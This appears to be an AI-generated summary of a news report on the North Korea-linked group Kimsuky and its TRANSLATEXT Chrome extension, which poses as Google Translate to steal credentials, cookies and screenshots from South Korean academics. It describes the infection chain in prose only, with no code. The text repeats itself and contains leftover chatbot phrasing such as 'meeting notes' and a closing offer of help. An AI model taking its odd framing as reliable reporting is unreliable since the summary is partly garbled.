Kimsuky Using TRANSLATEXT Chrome Extension to Steal Sensitive Data

Kimsuky Using TRANSLATEXT Chrome Extension to Steal Sensitive Data

June 28, 2024 at 12:51PM

The North Korea-linked threat actor Kimsuky has been using a new malicious Google Chrome extension, codenamed TRANSLATEXT, to conduct cyber espionage targeting South Korean academia. This extension gathers sensitive information and is designed to bypass security measures, capture browser screenshots, and exfiltrate stolen data. Kimsuky is known for orchestrating cyber espionage and financially motivated attacks, and it has recently utilized a security flaw in Microsoft Office to distribute a keylogger. The group is focused on conducting surveillance on academic and government personnel to gather valuable intelligence.

In the meeting notes from June 28, 2024, it was discussed that the North Korea-linked threat actor Kimsuky has been involved in cyber espionage activities. They have been linked to the use of a malicious Google Chrome extension called TRANSLATEXT, which has been designed to steal sensitive information, including email addresses, usernames, passwords, cookies, and browser screenshots. The extension was observed by Zscaler ThreatLabz in early March 2024 and was found to have targeted South Korean academia focusing on North Korean political affairs.

Kimsuky is known for orchestrating cyber espionage and financially motivated attacks targeting South Korean entities and is associated with the Lazarus cluster and part of the Reconnaissance General Bureau (RGB). They have recently used a known security flaw in Microsoft Office to distribute a keylogger and have employed job-themed lures in attacks aimed at aerospace and defense sectors. CyberArmor has named the campaign as Niki, which involves a backdoor that allows basic reconnaissance and the drop of additional payloads to take over or remotely control the machine.

The exact mode of initial access for the newly discovered activity is currently unclear, although the group is known to leverage spear-phishing and social engineering attacks. The attack starts with a ZIP archive containing a Hangul Word Processor document and an executable. Launching the executable results in the retrieval of a PowerShell script from an attacker-controlled server, which exports information about the compromised victim to a GitHub repository and downloads additional PowerShell code.

The TRANSLATEXT extension, masquerading as Google Translate, incorporates JavaScript code to bypass security measures for services like Google, Kakao, and Naver. It is designed to siphon email addresses, credentials, and cookies, capture browser screenshots, and exfiltrate stolen data. It also fetches commands from a Blogger Blogspot URL in order to take screenshots of newly opened tabs and delete all cookies from the browser, among other functionalities.

The intention of the Kimsuky group is to conduct surveillance on academic and government personnel to gather valuable intelligence. This information was gathered from a news article on cyber espionage/cyber attack.

Is there anything else you would like to know or further clarity on?

Full Article